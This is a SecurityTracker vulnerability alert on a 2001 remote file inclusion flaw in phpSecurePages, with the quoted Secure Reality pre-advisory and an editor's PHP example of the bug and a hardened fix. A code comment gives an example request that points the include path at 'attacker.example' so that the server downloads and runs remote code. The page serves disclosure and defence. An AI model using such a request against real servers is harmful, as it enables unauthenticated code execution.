SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Web Server/CGI)  >   phpSecurePages
Vendors:   Kruyt, Paul
phpSecurePages Allows Remote Unauthenticated Users to Execute Commands on the Server
SecurityTracker Alert ID:  1001408
SecurityTracker URL:  http://securitytracker.com/id/1001408
CVE Reference:   CVE-2001-1468   (Links to External Site)
Updated:  May 12 2008
Original Entry Date:  Apr 23 2001
Impact:   Execution of arbitrary code via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Version(s): phpSecurePages 0.23 beta
Description:   Secure Reality announced a vulnerability in phpSecurePages that allows remote users to execute commands on the server without authentication.

Secure Reality plans a full advisory shortly. Prior versions are assumed to be vulnerable but have not been tested by Secure Reality.

The vendor reports that the vulnerability applies only to Unix (including Linux) servers, and only if PHP is configured to accept files from remote servers. The flaw is a remote file inclusion: the application includes a file whose path can be influenced by the request, and PHP's allow_url_fopen setting (enabled by default in PHP 4) lets that include fetch attacker-supplied PHP code over HTTP and run it.
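
The following is an added illustration by the editor, not phpSecurePages code and not part of the Secure Reality advisory. It shows the class of bug described above, a request-influenced include path on a PHP installation that fetches includes over HTTP, beside a hardened form. The variable `$prog_dir`, the file names `secure.php` and `login.php`, and the host `attacker.example` are hypothetical and are not taken from the page.

```php
<?php
// Added example (editor's illustration, not phpSecurePages code). It shows the
// class of bug the advisory describes: an include path built from a variable
// that a request can set, on a PHP install that will fetch includes over HTTP.
// $prog_dir and the file names below are hypothetical, not taken from the page.

// ---- Vulnerable pattern (PHP 4 era: register_globals=On, allow_url_fopen=On) ----
// With register_globals, a request such as
//     GET /app/page.php?prog_dir=http://attacker.example/
// sets $prog_dir before this line runs, so PHP downloads and executes
// http://attacker.example/secure.php, with no login required:
//
//     include($prog_dir . "secure.php");

// ---- Hardened form ----
// 1. The include directory comes from the script's own location, never from
//    the request, so a register_globals-style overwrite cannot reach it.
define('PROG_DIR', dirname(__FILE__) . '/');

// 2. Only a fixed set of file names may be included, and the resolved path
//    must stay inside PROG_DIR (realpath() returns false for URLs and
//    canonicalises any '..' escapes so they can be rejected).
function safe_include_path($base, $file)
{
    $allowed = array('secure.php', 'login.php');   // hypothetical file names
    if (!in_array($file, $allowed, true)) {
        return false;
    }
    $base_real = realpath($base);
    $real = realpath($base . $file);
    if ($base_real === false || $real === false) {
        return false;
    }
    if (strpos($real, $base_real . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $real;
}

// 3. Belt and braces: refuse to run while PHP will still fetch remote files
//    for include(), so a future regression cannot be exploited this way.
//    PHP 5.2+ has a separate allow_url_include directive; older PHP used the
//    single allow_url_fopen setting for both fopen() and include().
$url_includes = ini_get('allow_url_include');
if ($url_includes === false) {
    $url_includes = ini_get('allow_url_fopen');
}
if ($url_includes) {
    die('PHP will include remote URLs; disable allow_url_include/allow_url_fopen in php.ini');
}

$path = safe_include_path(PROG_DIR, 'secure.php');
if ($path === false) {
    die('refusing to include a file outside the application directory');
}
include($path);
```

The hardened form removes the request from the include path entirely rather than trying to filter it; the allow-list and `realpath()` check then catch any later code path that reintroduces user input. The directive check at step 3 is the same mitigation the vendor gave as a workaround (do not let PHP accept files from remote servers), enforced by the script itself.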

Impact:   A remote user can point the vulnerable include at a URL under their control, causing the server to fetch and execute attacker-supplied PHP code without any authentication.
Solution:   The vendor has released version 0.25 beta, which corrects the problem. See the vendor URL.

Secure Reality also provided patches. See the source message for information on the Secure Reality patches.

Vendor URL:  www.phpSecurePages.f2s.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  (SRPRE00002) phpSecurePages 0.23 beta


=================================================
Secure Reality Pty Ltd. Security Pre-Advisory #2 (SRPRE00002)
http://www.securereality.com.au
=================================================

[Title]
Remote command execution vulnerabilities in phpSecurePages

[Released]
23/4/2001

This is a pre-release. This vulnerability will be discussed in detail during
Shaun Clowes' speech at the Black Hat briefings in Asia in the week of the
23rd of April. A full advisory will be issued following the conference.

[Vulnerable]
phpSecurePages 0.23 beta

All prior versions are almost certainly vulnerable but not tested

[Impact]
Remote command execution by unauthenticated remote users

[Fix]
The Authors have not yet been able to correct the issues in mainstream
versions. SecureReality is providing patches for the problems; no liability
for the performance or effectiveness of these patches is accepted.

phpSecurePages 0.23 beta:
http://www.securereality.com.au/patches/phpSecurePages-SecureReality.diff

Users of earlier versions are advised to upgrade to the versions specified
then apply the patches.

To apply the patches:
 - cd to the directory in which the application files are stored (e.g
   /home/httpd/html/phpSecurePages/)
 - run 'patch -p0 < *Path to patch file*'

[Disclaimer]
Advice, directions and instructions on security vulnerabilities in this
advisory do not constitute: an endorsement of illegal behavior; a guarantee
that protection measures will work; an endorsement of any product or
solution or recommendations on behalf of Secure Reality Pty Ltd. Content is
provided as is and Secure Reality Pty Ltd does not accept responsibility for
any damage or injury caused as a result of its use.

Copyright 2021, SecurityGlobal.net LLC